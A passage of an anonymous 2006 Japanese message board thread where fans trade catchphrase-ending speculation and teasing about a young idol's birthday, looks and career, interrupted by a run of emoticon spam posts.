401 :ユーが名無しネ:2006/03/01(水) 17:42:46


402 :ユーが名無しネ:2006/03/01(水) 17:43:20


403 :ユーが名無しネ:2006/03/01(水) 17:44:20


404 :ユーが名無しネ:2006/03/01(水) 17:49:14
D

405 :ユーが名無しネ:2006/03/01(水) 17:49:52


406 :ユーが名無しネ:2006/03/01(水) 17:50:25


407 :ユーが名無しネ:2006/03/01(水) 17:55:26


408 :ユーが名無しネ:2006/03/01(水) 17:55:58


409 :ユーが名無しネ:2006/03/01(水) 17:57:35


410 :ユーが名無しネ:2006/03/01(水) 17:58:15


411 :ユーが名無しネ:2006/03/01(水) 17:58:50


412 :ユーが名無しネ:2006/03/01(水) 17:59:21


413 :ユーが名無しネ:2006/03/01(水) 17:59:58


414 :ユーが名無しネ:2006/03/01(水) 18:00:23


415 :ユーが名無しネ:2006/03/01(水) 18:04:02


416 :ユーが名無しネ:2006/03/01(水) 18:06:59


417 :ユーが名無しネ:2006/03/01(水) 18:07:45


418 :ユーが名無しネ:2006/03/01(水) 18:08:50


419 :ユーが名無しネ:2006/03/01(水) 18:09:29


420 :ユーが名無しネ:2006/03/01(水) 18:10:23


421 :ユーが名無しネ:2006/03/01(水) 18:11:21


422 :ユーが名無しネ:2006/03/01(水) 18:12:38


423 :ユーが名無しネ:2006/03/01(水) 18:13:25


424 :ユーが名無しネ:2006/03/01(水) 18:14:07


425 :ユーが名無しネ:2006/03/02(木) 12:25:19
卒業おめでとうなんじゃないの!?ウナムー

426 :ユーが名無しネ:2006/03/04(土) 01:29:17
.

427 :ユーが名無しネ:2006/03/04(土) 01:30:44
..

428 :ユーが名無しネ:2006/03/04(土) 02:57:27
Y

429 :ユーが名無しネ:2006/03/04(土) 02:57:59
O

430 :ユーが名無しネ:2006/03/06(月) 12:35:25
.

431 :ユーが名無しネ:2006/03/07(火) 00:00:52
..........

432 :ユーが名無しネ:2006/03/14(火) 01:02:02


433 :ユーが名無しネ:2006/03/14(火) 01:02:51


434 :ユーが名無しネ:2006/03/14(火) 01:14:06
いい加減にしろなんじゃないの!?縦読み厨

435 :ユーが名無しネ:2006/03/17(金) 22:52:51
今日ずっとハイテンションだったんじゃないの!?ウナムー

436 :ユーが名無しネ:2006/03/18(土) 17:37:14
鑢バックのウナムーモヘ

437 :ユーが名無しネ:2006/03/19(日) 00:18:04
結構ω大きいんじゃないの!?ウナムー

438 :名無しさん:2006/03/25(土) 17:51:22
幸宏に失礼なスレッドですねーーー
 幸宏の事考えなーー

439 :ユーが名無しネ:2006/03/28(火) 01:09:40
はぁ〜

440 :ユーが名無しネ:2006/03/30(木) 23:47:42
ふぅ〜

441 :ユーが名無しネ:2006/03/31(金) 15:21:08
最近、反抗的なんじゃないの?!ウナムー

442 :ユーが名無しネ:2006/04/03(月) 01:45:12
そんなことないんじゃないの?!ウナムー



443 :ユーが名無しネ:2006/04/03(月) 01:48:51


444 :ユーが名無しネ:2006/04/03(月) 01:49:55


445 :ユーが名無しネ:2006/04/03(月) 01:52:56


446 :ユーが名無しネ:2006/04/03(月) 02:05:56
AAAの毛糸頭チョト似てるんじゃないの!?ウナムー

447 :ユーが名無しネ:2006/04/03(月) 03:59:33
今日はご機嫌だったんじゃないの?!ウナムー

448 :ユーは名無しネ:2006/04/04(火) 02:23:31
これから行くんだが演舞城のウナムー率はどのくらいなんだ?
期待していいのか?

449 :ユーは名無しネ:2006/04/04(火) 21:46:13
行ってきたツマンネ
なんのために窓いるんだ
全部放出スル

450 :ユーが名無しネ:2006/04/05(水) 15:46:52
>448-449
何処からお出でなのか気になるんじゃないの!?ウナムー

451 :ユーが名無しネ:2006/04/05(水) 20:40:42
>450
気にするな by ウナムー

452 :ユーが名無しネ:2006/04/06(木) 02:12:31
布フリ苦手なんじゃないの?!ウナムー

453 :ユーが名無しネ:2006/04/06(木) 02:25:34
お約束守れない人が多すぎるんじゃないの!?ウナムー

454 :ユーが名無しネ:2006/04/06(木) 06:56:30
>453
気にするな by ウナムー

455 :ユーが名無しネ:2006/04/06(木) 14:35:35
(^_^)/~なんじゃないの!?ウナムー

456 :ユーが名無しネ:2006/04/08(土) 13:25:02


457 :ユーが名無しネ:2006/04/10(月) 00:22:39
春から大学生なのか気になるんじゃないの!?ウナムー

458 :ユーが名無しネ:2006/04/10(月) 23:59:06
大学生なんじゃないの!?ウナムー

459 :ユーが名無しネ:2006/04/11(火) 00:04:05
大学生じゃないんじゃないの!?ウナムー

460 :ユーが名無しネ:2006/04/11(火) 00:08:16
専門学生なんじゃないの!?ウナムー

461 :ユーが名無しネ:2006/04/11(火) 01:33:58
フリーターなんじゃないの!?ウナムー


462 :ユーが名無しネ:2006/04/11(火) 01:34:55
ニートなんじゃないの!?ウナムー


463 :ユーが名無しネ:2006/04/11(火) 01:35:48
ヒッキーなんじゃないの!?ウナムー


464 :ユーが名無しネ:2006/04/11(火) 01:37:29
実は卒業できてないんじゃないの!?ウナムー


465 :ユーが名無しネ:2006/04/11(火) 01:39:07
実は就職なんじゃないの!?ウナムー


466 :ユーが名無しネ:2006/04/11(火) 01:40:55
実はジャニーズ事務所に就職なんじゃないの!?ウナムー


467 :ユーが名無しネ:2006/04/11(火) 01:41:55
実は大きな夢や希望を抱いてるんじゃないの!?ウナムー


468 :ユーが名無しネ:2006/04/11(火) 01:42:55
実はデビューなんじゃないの!?ウナムー


469 :ユーが名無しネ:2006/04/11(火) 01:44:12
実はNEWS入り狙ってるんじゃないの!?ウナムー


470 :ユーが名無しネ:2006/04/11(火) 01:46:07
実は結婚するんじゃないの!?ウナムー

471 :ユーが名無しネ:2006/04/11(火) 01:46:18
実は婿養子なんじゃないの!?ウナムー


472 :ユーが名無しネ:2006/04/11(火) 01:47:18
それってマスオさんなんじゃないの!?ウナムー


473 :ユーが名無しネ:2006/04/11(火) 01:48:13
彼女いないんじゃないの!?ウナムー

474 :ユーが名無しネ:2006/04/11(火) 01:49:07
それって痛いんじゃないの!?ウナムー


475 :ユーが名無しネ:2006/04/11(火) 01:49:59
傷心なんじゃないの!?ウナムー


476 :ユーが名無しネ:2006/04/11(火) 01:51:09
ふられちゃったんじゃないの!?ウナムー

477 :ユーが名無しネ:2006/04/11(火) 01:51:19
まだ傷が癒えてないなんて諦め悪いんじゃないの!?ウナムー


478 :ユーが名無しネ:2006/04/11(火) 01:52:08
意外と乙女なんじゃないの!?ウナムー


479 :ユーが名無しネ:2006/04/11(火) 01:53:03
また俺コン見たいんじゃないの!?ウナムー


480 :ユーが名無しネ:2006/04/11(火) 01:54:48
石鹸紺出るんじゃないの!?ウナムー

481 :ユーが名無しネ:2006/04/11(火) 01:54:56
勝紺出るか気になるんじゃないの!?ウナムー


482 :ユーが名無しネ:2006/04/11(火) 01:56:56
少倉もどうなのか気になるんじゃないの!?ウナムー

483 :ユーが名無しネ:2006/04/11(火) 01:58:39
嵐紺も気になるんじゃないの!?ウナムー


484 :ユーが名無しネ:2006/04/11(火) 01:58:43
プレゾンとかもあるんじゃないの!?ウナムー

485 :ユーが名無しネ:2006/04/11(火) 01:59:38
サマリーとかもあったりするんじゃないの!?ウナムー

486 :ユーが名無しネ:2006/04/11(火) 02:00:03
いい加減にしてほしいんじゃないの!?厨レス

487 :ユーが名無しネ:2006/04/11(火) 02:00:34
ウナソロ紺とかもあるんじゃないの!?ウナムー



488 :ユーが名無しネ:2006/04/11(火) 02:01:59
是非やって欲しいんじゃないの!?ウナムー


489 :ユーが名無しネ:2006/04/11(火) 02:03:17
まずグローブ座なんじゃないの!?ウナムー


490 :ユーが名無しネ:2006/04/11(火) 02:04:05
演舞場でいいんじゃないの!?ウナムー

491 :ユーが名無しネ:2006/04/11(火) 02:04:58
最前いくらか気になるんじゃないの!?ウナムー


492 :ユーが名無しネ:2006/04/11(火) 02:05:44
大変な事になるんじゃないの!?ウナムー


493 :ユーが名無しネ:2006/04/11(火) 02:05:51
いくらでも積むんじゃないの!?ウナムー

494 :ユーが名無しネ:2006/04/11(火) 02:06:57
恐ろしいんじゃないの!?ウナムー


495 :ユーが名無しネ:2006/04/11(火) 02:07:32
無駄なレスでスレ消費はやめてくれなんじゃないの!?

496 :ユーが名無しネ:2006/04/11(火) 02:08:17
バッグは誰が付くのか気になるんじゃにの!?ウナムー


497 :ユーが名無しネ:2006/04/11(火) 02:09:12
鏝いい加減にしろなんじゃないの!?全角厨と改行厨

498 :ユーが名無しネ:2006/04/11(火) 02:09:30
↑最後間違えてるんじゃないの!?ウナムー


499 :ユーが名無しネ:2006/04/11(火) 02:10:59
足2とかいいんじゃないの!?ウナムー


500 :ユーが名無しネ:2006/04/11(火) 02:11:26
鏝が鏝に気づいていない件

501 :ユーが名無しネ:2006/04/11(火) 02:11:39
海老氏でもいいんじゃないの!?ウナムー

502 :ユーが名無しネ:2006/04/11(火) 02:12:55
思い切って環八とかでいいんじゃないの!?ウナムー


503 :ユーが名無しネ:2006/04/11(火) 02:13:40
携帯っぽいから鏝に気付いてないんじゃないの!?連投厨

504 :ユーが名無しネ:2006/04/11(火) 02:16:51
特急だとしょぼいんじゃないの!?ウナムー


505 :ユーが名無しネ:2006/04/11(火) 02:17:04
踊れるコがいいんじゃないの!?ウナムー

506 :ユーが名無しネ:2006/04/11(火) 02:17:40
↑それいいんじゃないの!?ウナムー


507 :ユーが名無しネ:2006/04/11(火) 02:18:58
魔でもいいんじゃないの!?ウナムー


508 :ユーが名無しネ:2006/04/11(火) 02:19:07
それは贅沢なんじゃないの!?ウナムー

509 :ユーが名無しネ:2006/04/11(火) 02:19:42
衣装も気になるんじゃないの!?ウナムー


510 :ユーが名無しネ:2006/04/11(火) 02:20:40
腕輪はやっぱり必須なんじゃないの!?ウナムー


511 :ユーが名無しネ:2006/04/11(火) 02:21:22
オーバーオールとかいいんじゃないの!?ウナムー

512 :ユーが名無しネ:2006/04/11(火) 02:22:37
ハットは斜めかぶりなんじゃないの!?ウナムー

513 :ユーが名無しネ:2006/04/11(火) 02:23:13
ハットは衣装なんじゃないの!?ウナムー


514 :ユーが名無しネ:2006/04/11(火) 02:24:21
からあげまだ好きなのか気になるんじゃないの!?ウナムー


515 :ユーが名無しネ:2006/04/11(火) 02:25:25
最近眉毛細いんじゃないの!?ウナムー


516 :ユーが名無しネ:2006/04/11(火) 02:26:15
最近フタエなんじゃないの!?ウナムー

517 :ユーが名無しネ:2006/04/11(火) 02:27:20
本当はいじっちゃった系なんじゃないの!?ウナムー


518 :ユーが名無しネ:2006/04/11(火) 02:28:00
アイプチなんじゃないの!?ウナムー

519 :ユーが名無しネ:2006/04/11(火) 02:28:59
毎日アイプチ大変なんじゃないの!?ウナムー


520 :ユーが名無しネ:2006/04/11(火) 02:29:43
汗が気になって仕方ないんじゃないの!?ウナムー


521 :ユーが名無しネ:2006/04/11(火) 02:30:39
汗かくほど出番ないんじゃないの!?ウナムー

522 :ユーが名無しネ:2006/04/11(火) 02:31:12
↑痛いんじゃないの!?ウナムー


523 :ユーが名無しネ:2006/04/11(火) 02:31:57
触れちゃいけないんじゃないの!?ウナムー


524 :ユーが名無しネ:2006/04/11(火) 02:32:57
最近の仲良しジュニア気になるんじゃないの!?

525 :ユーが名無しネ:2006/04/11(火) 02:33:55
ここでその話題はやめた方がいいんじゃないの!?ウナムー


526 :ユーが名無しネ:2006/04/11(火) 02:34:41
↑なんで?

527 :ユーが名無しネ:2006/04/11(火) 02:35:51
ヘンなのが来るからなんじゃないの!?ウナムー

528 :ユーが名無しネ:2006/04/11(火) 02:36:30
こわいょー

529 :ユーが名無しネ:2006/04/11(火) 02:37:20
もうヘンなのが来てるんじゃないの!?ウナムー


530 :ユーが名無しネ:2006/04/11(火) 02:38:58
ギターはそんなに楽しくないの?って聞きたくなるんじゃないの!?ウナムー


531 :ユーが名無しネ:2006/04/11(火) 02:40:03
本当にギター弾けるのか気になるんじゃないの!?ウナムー

532 :ユーが名無しネ:2006/04/11(火) 02:40:07
ギター弾けるの?!ウナムー

533 :ユーが名無しネ:2006/04/11(火) 02:41:01
↑かぶっちゃったんじゃないの!?ウナムー


534 :ユーが名無しネ:2006/04/11(火) 02:42:03
城はかぶってよく見えないんじゃないの!?ウナムー


535 :ユーが名無しネ:2006/04/11(火) 02:43:23
実は二階の最前が一番高額なんじゃないの!?ウナムー


536 :ユーが名無しネ:2006/04/11(火) 02:44:46
18日恐ろしいんじゃないの!?ウナムー

537 :ユーが名無しネ:2006/04/11(火) 02:46:22
誕生日近いんじゃないの!?ウナムー

538 :ユーが名無しネ:2006/04/11(火) 02:46:23
誰と祝うのか気になるんじゃないの!?ウナムー


539 :ユーが名無しネ:2006/04/11(火) 02:47:09
普通に城なんじゃないの!?ウナムー


540 :ユーが名無しネ:2006/04/11(火) 02:48:02
普通にチャンなんじゃないの!?ウナムー

541 :ユーが名無しネ:2006/04/11(火) 02:48:11
TJなんじゃないの!?ウナムー

542 :ユーが名無しネ:2006/04/11(火) 02:48:46
枝でもいいんじゃないの!?ウナムー

543 :ユーが名無しネ:2006/04/11(火) 02:50:14
結局窓に祝ってもらうんじゃないの!?ウナムー


544 :ユーが名無しネ:2006/04/11(火) 02:51:42
コンビニケーキでお祝いなんじゃないの!?ウナムー

545 :ユーが名無しネ:2006/04/11(火) 02:52:10
それは切ないんじゃないの!?ウナムー


546 :ユーが名無しネ:2006/04/11(火) 02:53:09
手作りケーキ欲しいんじゃないの!?ウナムー


547 :ユーが名無しネ:2006/04/11(火) 02:54:01
誰が作ってくるのか気になるんじゃないの!?ウナムー

548 :ユーが名無しネ:2006/04/11(火) 02:54:26
TJでいいんじゃないの!?ウナムー

549 :ユーが名無しネ:2006/04/11(火) 02:55:11
チャンも立候補なんじゃないの!?ウナムー


550 :ユーが名無しネ:2006/04/11(火) 02:55:36
枝でFAなんじゃないの!?ウナムー

551 :ユーが名無しネ:2006/04/11(火) 15:55:15
記念すべき19才のお誕生日は、密会しちゃうんじゃないの!?ウナムー

552 :ユーが名無しネ:2006/04/12(水) 03:22:07
誰と密会か気になるんじゃないの!?ウナムー

553 :ユーが名無しネ:2006/04/12(水) 03:23:10
普通に家に帰るだけなんじゃないの!?ウナムー

554 :ユーが名無しネ:2006/04/12(水) 03:24:28
それは寂しいんじゃないの!?ウナムー

555 :ユーが名無しネ:2006/04/12(水) 03:26:21
自分でケーキ買って帰るんじゃないの!?ウナムー

556 :ユーが名無しネ:2006/04/12(水) 03:27:16
からあげでお祝いなんじゃないの!?ウナムー

557 :ユーが名無しネ:2006/04/12(水) 03:28:56
一緒にお祝いしたいんじゃないの!?ウナムー

558 :ユーが名無しネ:2006/04/12(水) 03:30:24
それは拒否されるんじゃないの!?ウナムー

559 :ユーが名無しネ:2006/04/13(木) 00:47:24
ばあやはプレゼントおねだりされたいんじゃないの!?ウナムー

560 :ユーが名無しネ:2006/04/13(木) 20:28:21
ばあやがいくらでも出してあげるわよ!?ウナムー

561 :ユーが名無しネ:2006/04/13(木) 23:29:15
ばあや来るなー

562 :ユーが名無しネ:2006/04/14(金) 01:55:12
今日は誰と何してるか気になるんじゃないの!?ウナムー

563 :ユーが名無しネ:2006/04/14(金) 01:56:57
ウナのことはいつも気になるんじゃないの!?ウナムー



564 :ユーが名無しネ:2006/04/14(金) 01:58:17
城のやる気なさが気になるんじゃないの!?ウナムー

565 :ユーが名無しネ:2006/04/14(金) 01:59:37
ギターは本当に弾いてるの?と聞きたいんじゃないの!?ウナムー

566 :ユーが名無しネ:2006/04/14(金) 02:02:13
最近痩せた?と聞きたいんじゃないの!?ウナムー

567 :ユーが名無しネ:2006/04/14(金) 02:02:53
ほんとに痩せたんじゃないの!?ウナムー

568 :ユーが名無しネ:2006/04/14(金) 02:03:38
↑今更なんじゃないの!?ウナムー

569 :ユーが名無しネ:2006/04/14(金) 02:05:21
もう白ブタとは言わせないよ!と言いたいんじゃないの!?ウナムー

570 :ユーが名無しネ:2006/04/14(金) 02:06:13
黒ブタなんて時もあったんじゃないの!?ウナムー

571 :ユーが名無しネ:2006/04/14(金) 02:08:09
黒ブタ嫌いじゃなかったんじゃないの!?ウナムー

572 :ユーが名無しネ:2006/04/14(金) 02:09:35
白ブタなウナが好きなんじゃないの!?ウナムー

573 :ユーが名無しネ:2006/04/14(金) 02:10:36
どっちでもいいんじゃないの!?ウナムー

574 :ユーが名無しネ:2006/04/14(金) 02:14:11
眉毛太かった身体細かったは過去形なんじゃないの!?ウナムー

575 :ユーが名無しネ:2006/04/14(金) 02:15:20
眉毛細くなった体も細くなったんじゃないの!?ウナムー

576 :ユーが名無しネ:2006/04/14(金) 02:16:51
いや、眉毛薄くなって細くなったの方がいいんじゃないの!?ウナムー

577 :ユーが名無しネ:2006/04/14(金) 02:19:29
最近おっさん顔ではないんじゃないの!?ウナムー

578 :ユーが名無しネ:2006/04/14(金) 02:20:12
若返ったんじゃないの!?ウナムー

579 :ユーが名無しネ:2006/04/14(金) 02:21:05
年相応なんじゃないの!?

580 :ユーが名無しネ:2006/04/14(金) 02:21:56
そろそろ19なんじゃないの!?ウナムー

581 :ユーが名無しネ:2006/04/14(金) 02:22:36
みんな知ってるんじゃないの!?ウナムー

582 :ユーが名無しネ:2006/04/14(金) 02:23:38
みんな知ってるかどうかが気になるんじゃないの!?ウナムー

583 :ユーが名無しネ:2006/04/14(金) 02:24:27
城でいじってもらいたいんじゃないの!?ウナムー

584 :ユーが名無しネ:2006/04/14(金) 02:25:36
そう願ってるんじゃないの!?ばあやー

585 :ユーが名無しネ:2006/04/14(金) 02:27:45
ばあやとウナムーって書き間違えてるんじゃないの!?ウナムー

586 :ユーが名無しネ:2006/04/14(金) 03:45:19
連続恐い byウナムー

587 :ユーが名無しネ:2006/04/17(月) 11:45:48
明日は15日のようなおたおめ叫び厨が出没しないか不安じゃないの!?ウナムー

588 :ユーが名無しネ:2006/04/17(月) 23:48:35
誕生日は誰と過ごすか気になるんじゃないの!?ウナムー

589 :ユーが名無しネ:2006/04/18(火) 00:02:02
お誕生日おめでとうなんじゃないの!?ウナムー

590 :ユーが名無しネ:2006/04/18(火) 00:02:40
誕生日おめでとうなんじゃないの!? ウナムー

591 :ユーが名無しネ:2006/04/18(火) 00:03:44
今日の滝城はヲタの視線を気にしすぎて
眉間に力が入っちゃうんじゃないの!?ウナムー

592 :ユーが名無しネ:2006/04/18(火) 10:37:53
ウナ、ハピオメ
これからも世話になるよ
よろしく

593 :ユーが名無しネ:2006/04/18(火) 10:56:40
19歳おめでとうなんじゃないの!? ウナムー

594 :ユーが名無しネ:2006/04/19(水) 01:51:46
数年で一番オメレス少ないんじゃないの!?ウナムー

595 :ユーが名無しネ:2006/04/20(木) 15:23:40
594の知らない所でハピバラシやったんじゃないの!?ウナムー

596 :ユーが名無しネ:2006/04/22(土) 23:51:11
オメなんじゃないの!?ウナムー

597 :ユーが名無しネ:2006/04/22(土) 23:51:59
↑少し遅いんじゃないの!?ウナムー

598 :ユーが名無しネ:2006/04/22(土) 23:54:20
次の仕事が気になるんじゃないの!?ウナムー

599 :ユーが名無しネ:2006/04/22(土) 23:55:07
あらち出るか気になるんじゃないの!?ウナムー

600 :ユーが名無しネ:2006/04/22(土) 23:56:07
その前に気になる仕事あるんじゃないの!?ウナムー

601 :ユーが名無しネ:2006/04/22(土) 23:57:23
ウナは何に出たいか気になるんじゃないの!?ウナムー

602 :ユーが名無しネ:2006/04/23(日) 07:39:30
出たいのはPZ byウナムー

603 :ユーが名無しネ:2006/04/24(月) 11:50:33
無理なんじゃないの!?ウナムー

604 :ユーが名無しネ:2006/04/25(火) 01:28:08
(・ω∩)

605 :ユーが名無しネ:2006/04/25(火) 01:29:20

`Д´

606 :ユーが名無しネ:2006/04/25(火) 01:30:23
(・Д・)ゞ

607 :ユーが名無しネ:2006/04/25(火) 01:31:18
(*゚□゚)ё..


608 :ユーが名無しネ:2006/04/25(火) 01:31:52
(´・ω・`)


609 :ユーが名無しネ:2006/04/25(火) 01:32:52
|・ω・)ノ

610 :ユーが名無しネ:2006/04/25(火) 01:33:56
゜◇゜)

611 :ユーが名無しネ:2006/04/25(火) 01:34:58
Σ|*-Д-*|!


612 :ユーが名無しネ:2006/04/25(火) 01:36:13

(★`・∀・´)


613 :ユーが名無しネ:2006/04/25(火) 01:36:54
(☆´Д`)φ☆


614 :ユーが名無しネ:2006/04/25(火) 01:38:19
(ーД・*)


615 :ユーが名無しネ:2006/04/25(火) 01:39:15
(★ё_ё)・・・


616 :ユーが名無しネ:2006/04/25(火) 01:40:56
―(-`ω´-)―

617 :ユーが名無しネ:2006/04/25(火) 01:41:57
(・ω-´。)

618 :ユーが名無しネ:2006/04/25(火) 01:43:08
―(゚Д゚)→


619 :ユーが名無しネ:2006/04/25(火) 01:46:00
(疲´-ω-)フゥ(-ω-`眠)


620 :ユーが名無しネ:2006/04/25(火) 01:47:24
ヽ(○・∇・)ノ

621 :ユーが名無しネ:2006/04/25(火) 01:48:22
(●・ω・○)⊃゚。+

622 :ユーが名無しネ:2006/04/25(火) 01:49:46
Σd(@´∀`*@。+:+。@*´∀`@)bΣ


623 :ユーが名無しネ:2006/04/26(水) 02:14:34
Σ(゚ロ゚;)



624 :ユーが名無しネ:2006/04/26(水) 02:15:15
... Σ(゚ω゚)



625 :ユーが名無しネ:2006/04/26(水) 02:15:59
( ゚Д゚)y \_


626 :ユーが名無しネ:2006/04/26(水) 02:16:38
w((´ω`))w

627 :ユーが名無しネ:2006/04/26(水) 02:17:24
Σ(-∀-;)


628 :ユーが名無しネ:2006/04/26(水) 02:19:34
(^-^*)/

629 :ユーが名無しネ:2006/04/26(水) 02:20:15
(。・ω・)ノ゙

630 :ユーが名無しネ:2006/04/26(水) 02:21:12
(*^・ェ・)ノ

631 :ユーが名無しネ:2006/04/26(水) 02:21:45
▼o・_・o▼

632 :ユーが名無しネ:2006/04/26(水) 02:22:43
(^コ^)

633 :ユーが名無しネ:2006/04/26(水) 02:23:24
(^ニ^)


634 :ユーが名無しネ:2006/04/26(水) 02:24:01
(^チ^)

635 :ユーが名無しネ:2006/04/26(水) 02:24:34
(^ワ^)


636 :ユーが名無しネ:2006/04/26(水) 02:26:01
( ゚▽゚)/

637 :ユーが名無しネ:2006/04/26(水) 02:26:47
(( -。-)

638 :ユーが名無しネ:2006/04/26(水) 02:27:42
ヾ(。・ェ・)

639 :ユーが名無しネ:2006/04/26(水) 02:28:31
ヾ(・_・O

640 :ユーが名無しネ:2006/04/26(水) 02:29:43
o(^-^ o )(ノ ^-^)ノ

641 :ユーが名無しネ:2006/04/26(水) 02:30:57
゚▽゚)/

642 :ユーが名無しネ:2006/04/26(水) 02:31:34
゚(ノ_・。)/

643 :ユーが名無しネ:2006/04/26(水) 02:32:26
(・_(・_(・_・。)ノ

644 :ユーが名無しネ:2006/04/26(水) 02:33:18
(。・"・

645 :ユーが名無しネ:2006/04/26(水) 02:34:12
Uo・ェ・oU

646 :ユーが名無しネ:2006/04/26(水) 02:35:07
.☆.

647 :ユーが名無しネ:2006/04/26(水) 02:36:15
ヾ(ーー )

648 :ユーが名無しネ:2006/04/26(水) 02:36:52
ヾ(・・;)

649 :ユーが名無しネ:2006/04/26(水) 02:37:35
ヾ(--;)

650 :ユーが名無しネ:2006/04/26(水) 02:38:20
(゚-゚;)

651 :ユーが名無しネ:2006/04/26(水) 02:38:29
連投厨氏ね

652 :ユーが名無しネ:2006/04/26(水) 02:40:24
(・ε・)

653 :ユーが名無しネ:2006/04/26(水) 02:41:10
( (。・ε・。)

654 :ユーが名無しネ:2006/04/26(水) 02:42:03
(@ε@)


655 :ユーが名無しネ:2006/04/26(水) 02:43:24
(*'-^)-☆

656 :ユーが名無しネ:2006/04/26(水) 02:44:28
( ・_-)

657 :ユーが名無しネ:2006/04/26(水) 02:45:29
!!o( ゚o゚)==

658 :ユーが名無しネ:2006/04/26(水) 02:46:37
★。.:*:・"☆★


659 :ユーが名無しネ:2006/04/26(水) 02:47:32
(ノ・_・

660 :ユーが名無しネ:2006/04/26(水) 02:48:32
▽゚)/゚・

661 :ユーが名無しネ:2006/04/26(水) 02:49:40
*:・゚\('∇'*)


662 :ユーが名無しネ:2006/04/26(水) 02:50:38
(* ̄(エ) ̄)/゚

663 :ユーが名無しネ:2006/04/26(水) 02:54:00
・'・;)

664 :ユーが名無しネ:2006/04/26(水) 02:55:01
?c(゚.゚*)

665 :ユーが名無しネ:2006/04/26(水) 02:56:10
(・o・)

666 :ユーが名無しネ:2006/04/26(水) 02:57:26
(ーΩー )

667 :ユーが名無しネ:2006/04/26(水) 02:58:36
・;)

668 :ユーが名無しネ:2006/04/26(水) 03:00:35
?c(゚.゚*)

669 :ユーが名無しネ:2006/04/26(水) 03:02:06
o^)/


670 :ユーが名無しネ:2006/04/26(水) 03:03:03
( ゚ー゚)

671 :ユーが名無しネ:2006/04/26(水) 03:05:08
(*・.・)ノ

672 :ユーが名無しネ:2006/04/26(水) 03:06:13
(>_・ )

673 :ユーが名無しネ:2006/04/26(水) 03:06:49
(^^)b

674 :ユーが名無しネ:2006/04/26(水) 03:07:31
(o^-')b

675 :ユーが名無しネ:2006/04/26(水) 03:08:41
(>_・ )!


676 :ユーが名無しネ:2006/04/26(水) 03:10:08
((・ω・)b

677 :ユーが名無しネ:2006/04/26(水) 03:11:10
d(* ̄o ̄)


678 :ユーが名無しネ:2006/04/26(水) 03:12:24
d(-_☆)

679 :ユーが名無しネ:2006/04/26(水) 03:13:29
(/・・)(/・・)


680 :ユーが名無しネ:2006/04/26(水) 03:14:07
(/゚∇゚)/

681 :ユーが名無しネ:2006/04/26(水) 03:15:13
ヽ(・ω・ ) (ω・ ) (・ ) ( ) ( ・) ( ・ω) ( ・ω・)/

682 :ユーが名無しネ:2006/04/26(水) 03:16:04
(/・0・)

683 :ユーが名無しネ:2006/04/26(水) 03:17:32
!! (・ω・)ゞε=ε=ε=ε=ε


684 :ユーが名無しネ:2006/04/26(水) 03:18:56
(=゚▽゚)/!!
(*゚▽゚)/

685 :ユーが名無しネ:2006/04/26(水) 03:19:49
((((((((((((((((( ̄ー ̄)

686 :ユーが名無しネ:2006/04/26(水) 03:20:46
(*'-')


687 :ユーが名無しネ:2006/04/26(水) 03:21:26
(≧∇≦)b

688 :ユーが名無しネ:2006/04/26(水) 03:22:25
( ̄▽ ̄)


689 :ユーが名無しネ:2006/04/26(水) 03:23:22
(*`д´)b

690 :ユーが名無しネ:2006/04/26(水) 03:24:08
゚ー゚)(。_。)

691 :ユーが名無しネ:2006/04/27(木) 01:37:53
これ同一の連投厨なら荒らし報告していいんじゃないの!?ウナムー担

692 :ユーが名無しネ:2006/04/27(木) 14:58:04
荒らし報告してくれ。byウナムー

693 :ユーが名無しネ:2006/04/29(土) 17:12:23
城後の仕事気になるんじゃないの!?ウナムー

694 :ユーが名無しネ:2006/05/04(木) 00:45:28
横蟻にいなかったんじゃないの・・・!?ウナムー

695 :ユーが名無しネ:2006/05/04(木) 15:03:49
プレミアムは撮ったよ byウナムー

696 :ユーが名無しネ:2006/05/16(火) 01:55:11
PZがんがってね!なんじゃないの!?ウナムー

697 :ユーが名無しネ:2006/05/23(火) 12:21:12
プレミアム、どんまい!なんじゃないの!?ウナムー



698 :ユーが名無しネ:2006/05/24(水) 01:20:03
間違えちゃったよ byウナムー

699 :ユーが名無しネ:2006/05/31(水) 14:06:41
間違えちゃっても、一番素敵だったんじゃないの!?ウナムー

700 :ユーが名無しネ:2006/06/03(土) 01:50:40
(  = ゝ = )ノシ 700

701 :ユーが名無しネ:2006/06/03(土) 04:54:40
age

702 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/08(木) 05:26:36
sage

703 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/09(金) 03:52:52
ぱっちり二重すてきなんじゃないの!?ウナムー ww

704 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/09(金) 11:44:15
えっ?

705 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/09(金) 13:38:31
こいつ、腹グロ

706 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/06/09(金) 15:45:10
ミヒィのスレはここじゃないですよ

707 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/28(水) 01:16:42
まだいたんだ。ウナムー

708 :6/30板住み分け投票@ユー投票しちゃいなYO!:2006/06/28(水) 21:08:46
嵐に出なくてファンはがっかりじゃないの?ウナムー

709 :ローカルルール議論中@ユーは蟻板自治スレへ:2006/07/08(土) 02:54:43
ちょ髪型考えたほーがいいんじゃないの!?ウナムー

710 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/12(水) 07:29:41
髪型落ち着いてほっとしたんじゃないの!?ウナムー

711 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/19(水) 14:05:05
ナムナム

712 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 22:17:27
75


713 :名無し・LR議論中@ユーは自治スレへ:2006/07/27(木) 15:23:56
最近、冷たいんじゃないの!?ウナムー

714 :ユーは名無しネ:2006/07/31(月) 20:08:50
カンチョーされすぎなんじゃないの!?ウナムー

715 :ユーは名無しネ:2006/08/12(土) 02:28:34
あげ

716 :ユーは名無しネ:2006/08/21(月) 21:40:24
ウナムー


717 :ユーは名無しネ:2006/08/22(火) 04:32:13
き   ら   い

718 :ユーは名無しネ:2006/09/03(日) 16:16:37
ウナムー

ウナムー

二重もイイじゃない?

ウナムー

ウナムー

719 :ユーは名無しネ:2006/09/25(月) 01:17:31
久々にしゃべり声聞いたんじゃないの!?ウナムー

720 :ユーは名無しネ:2006/10/02(月) 03:12:17
やっぱりスチなんじゃないの!?ウナムー

721 :ユーは名無しネ:2006/10/05(木) 01:23:24
昼ドラの俳優サソはやっぱり君に似てるんじゃないの!?ウナムー

722 :ユーは名無しネ:2006/11/10(金) 15:24:40
ナウムー

